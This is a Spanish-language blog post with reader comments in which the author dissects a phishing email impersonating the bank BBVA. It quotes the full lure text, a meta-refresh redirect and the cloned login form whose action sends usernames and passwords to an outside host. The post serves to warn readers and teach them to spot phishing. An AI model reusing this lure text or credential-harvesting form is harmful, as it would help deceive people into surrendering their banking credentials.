BBVA Phishing

Quizá por utilizar firmas GPG y no divulgar mi dirección de correo y tener la sana costumbre de eliminar las cadenas, presentaciones y demás, sólo recibo 4 o 5 correos spam por día… me considero un privilegiado.

La verdad, nunca había sido objetivo de phishing, pero hoy me llegó un correo supuestamente del banco BBVA. Primero que no tengo cuenta bancaria y mucho menos tendría cuenta de un banco en españa…

Dicho mail cayó en la carpeta de spam y lo abrí por curiosidad. El correo está muy mal redactado y tiene varias falencias, si fuera verdadero. No cuenta con logo, la URL que pasan no está disfrazada, y principalmente, los bancos nunca envían avisos de este tipo… en fin… varias cosas que me harían sospechar si realmente tuviera una cuenta bancaria.

Copio aquí el contenido del mail:

Estimado poseedor de la cuenta de BBVA,
Su Clave de Operaciones ha sido suspendida por exeder el maximo de intentos fallidos.
Nuestro sistema de seguridad ha detectado varios intentos de acceso no autorizado a su cuenta de BBVA,
desde el IP: 202.192.0.81
Como medida de seguridad nuestro sistema ha bloqueado su cuenta temporalmente. Para desbloquear su
cuenta, usted debe ingresar a su cuenta desde su IP y confirmar su identidad con su tarjeta de coordenadas.

Para reactivar su cuenta e clave de acceso haga clic en el enlace de abajo:

http://xx.xx.xxx.xx:8077/www.bbva.es/TLBS/tlbs/esp/segmento/particulares/index.htm

La NOTA: Si usted recibio este mensaje en usted carpeta de ENVIA SPAM/BULTO, eso es a causa de las
restricciones aplicadas por su proveedor de servicios de Internet. Gracias para su paciencia en este asunto.
Gracias para utilizar nuestro servicio BBVA net Office.
Servicio de atencion al cliente de BBVA.
Por favor no conteste a este correo electronico como esto es solo una notificacion.
El correo mandy a esta direccion no puede ser contestado.
Banco Bilbao Vizcaya Argentaria S.A. – 2010. Todos los derechos reservados

Además de los horrores de ortografía tiene una url con la IP expuesta (la oculté con XX para que ningún tonto vaya a seguir el link)

Abrí una consola y descargué el link con wget y veo lo siguiente:

<HTML><HEAD><TITLE>Cargando...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta http-equiv="Refresh" content="0;url=http://xx.xxx.xxx.xx:8011/www.bbva.es/TLBS/tlbs/esp/segmento/particulares/">

Otra IP. También la descargo con wget y me trae una página index.html. Y al analizarla me doy cuenta que todo el contenido de la página es tomado directamente del sitio del banco (bbva.es/TLBS/ etc etc etc). Todo: CSS, JavaScript, imágenes. Incluso los enlaces a otras secciones del banco son reales. No he revisado, pero estoy seguro que el esqueleto de esta página que he bajado es exactamente igual a la que proveería el sitio real del banco.

Excepto por un pequeño detalle:

<h2>Acceso cliente / Area privada</h2>
<form action="http://www.bel-amitravel.org/home-login.php" method="post" name="form_login" >
<label for="eai_user">usuario:</label>
<input type="text" name="username" id="eai_user" autocomplete="off" maxlength="16" onkeyup="javascript:cuenta();"eai_password" />
<label for="eai_password">contrasena:</label>
<input type="password" name="password" id="eai_password" autocomplete="off" onkeypress="enviarForm(event)" onchange="javascript:convertirPassAMayusculas();" value="" />
<a rel="shadowbox;width=780px;height=520px" target="Popin" href="https://www.bbva.es/TLBS/tlbs/esp/sistema/galleta/contrasena.jsp" title="Has olvidado tu contrasena?">Has olvidado tu contrasena?</a>
<button id="botonentrar" type="submit" value="Entrar" title="Entrar"> <span><span><span>Entrar</span></span></span> </button>

Noten la acción del formulario: los datos ingresados en el formulario de “Area Privada” van a parar directo a bel-amitravel.org, que muestra una supuesta página de reactivación de la cuenta. Y ahí es donde caen los que son ingenuos.

Quienes caigan en la trampa revelarán datos personales, número de tarjeta y PIN.

Volviendo al correo, al analizar la cabecera veo que la dirección de retorno es oficina245@bbuva.es (bb uva??) pero ésta salió del dominio mail.ozonegroup.com.

Como para terminar, hago ping a bel-amitravel.org y tomo nota. Entré a MaxMind GeoIP y me fijé de donde eran las 3 IP.

El primer link (la IP en el cuerpo del correo) es de Iran, que me redirigió a Rusia (2da IP) y si hubiera ingresado mis datos en el “Area Privada”, me redirige a un sitio en California, EEUU; donde está el formulario de “reactivación”.

Por favor, tengan mucho cuidado.

Recuerden que los Bancos y diferentes Entidades NUNCA solicitan reactivación de cuenta ni confirmación o cambio de contraseña por correo.

Lo que sucede generalmente es que nos damos cuenta que la cuenta está bloqueada, o que debemos cambiar nuestra contraseña, al intentar ingresar.

Para finalizar, como regla Nunca hagan clic en los links incluídos en correos electrónicos.

Editado el 19-06-2010

De la página de BBVA.es:

Y recuerde que BBVA nunca le enviará por correo electrónico solicitud de que informe sus datos personales. En caso de recibir un mensaje en este sentido, por favor, no facilite dato alguno y contacte inmediatamente con el teléfono de BBVA 902 18 18 18.

I.2.3. Ingeniería Social.

Se trata de convencer al usuario para realizar algo que en realidad no debería hacer. Por ejemplo, una práctica común consiste en llamar o escribir un email (phishing)al usuario haciéndose pasar por un administrador del sistema y solicitarle sus claves de acceso y operaciones con alguna excusa. Por su seguridad, es fundamental que Vd. no revele sus datos (nº de usuario y claves de acceso y operaciones) a nadie, ni por correo electrónico ni a través del teléfono, Vd. es el único que conoce sus claves de acceso y operaciones. Nadie en BBVA conoce ni debe conocer cuales son sus claves.

Recuerde que BBVA nunca le solicitará ni por correo electrónico, ni por teléfono ni por SMS que informe de sus claves de BBVA.es. Sus claves de BBVA.es son secretas y únicamente Vd. debe conocerlas para su utilización exclusiva en la propia BBVA.es (http://www.bbva.es).

About these ads

8 comentarios (+¿añadir los tuyos?)

  1. FCR
    jun 28, 2010 @ 02:43:16

    Bueno, mas de uno debe haber caído ya.
    Publicar esto es bueno, por que hace mas fácil marcar como SCAM.

    Responder

  2. Andrea
    ago 23, 2010 @ 03:05:49

    Buenas!!

    Yo recibo casi diarimente este correo del que hablas. Hoy, de hecho, he abierto el correo y tenía uno en la bandeja de entrada y dos en la de correo no deseado. Ya me están tocando un poco las narices… Por supuesto que no me molesto ni en abrirlos porque no tengo cuenta en este banco.

    Como también comentas, están fatal redactados. Hay frases que no tienen ningún sentido…

    Si esto sigue así, avisaré al servicio correspondiente del BBVA porque me parece ya la leche…

    Un saludo!!

    Responder

  3. JoseLu
    ago 28, 2010 @ 12:04:26

    Yo recibí este correo los otros días y en mi blog tengo un pequeño artículo dedicado al phising. Un saludo

    Responder

  4. dannuiela
    ago 30, 2010 @ 20:20:59

    Yo tambien recibi este e-mail, en la bandeja de entrada tenia 3 y en correo no deseado 9. y ni siquiera tengo una cuenta en este banco.

    Responder

  5. jinetedeldragon
    ago 30, 2010 @ 22:02:10

    Gracias a ambos, JoseLu y dannuiela.
    Lo importante es hacer caso omiso y no responder ni seguir nunca las instrucciones que indiquen.
    Cuando tengan dudas, lo mejor es llamar al banco (si es que son clientes) y preguntar.

    Responder

  6. belen
    dic 07, 2010 @ 14:12:40

    Hola, tengo entendido que para entrar de forma segura en la página de tu banco, lo mejor es poner en la barra de dirección la IP del mismo. Pero alguien podría indicarme cómo obtener dicha IP?

    Gracias.

    Responder

    • jinetedeldragon
      dic 07, 2010 @ 15:37:47

      Hola belén. No necesariamente es cierto.
      Los DNS sirven para asociar un dominio a una IP, por lo que google.com es lo mismo que 209.85.195.104
      La IP se puede averiguar con diversas herramientas, como ping, o con algún sitio whois…

      Igualmente esta entrada sobre phishing fue para demostrar y instruir a todos a que NUNCA deben seguir los links de un correo electrónico sin antes comprobar que realmente solicitaste ese correo, o que es de una fuente real.

      Responder

  7. Beto
    jul 24, 2012 @ 21:44:41

    gracias por la informacion, es excelente

    Responder

Deja un comentario

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Archivos

junio 2010
D L M X J V S
« may   jul »
 12345
6789101112
13141516171819
20212223242526
27282930  
Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

Únete a otros 96 seguidores

A %d blogueros les gusta esto: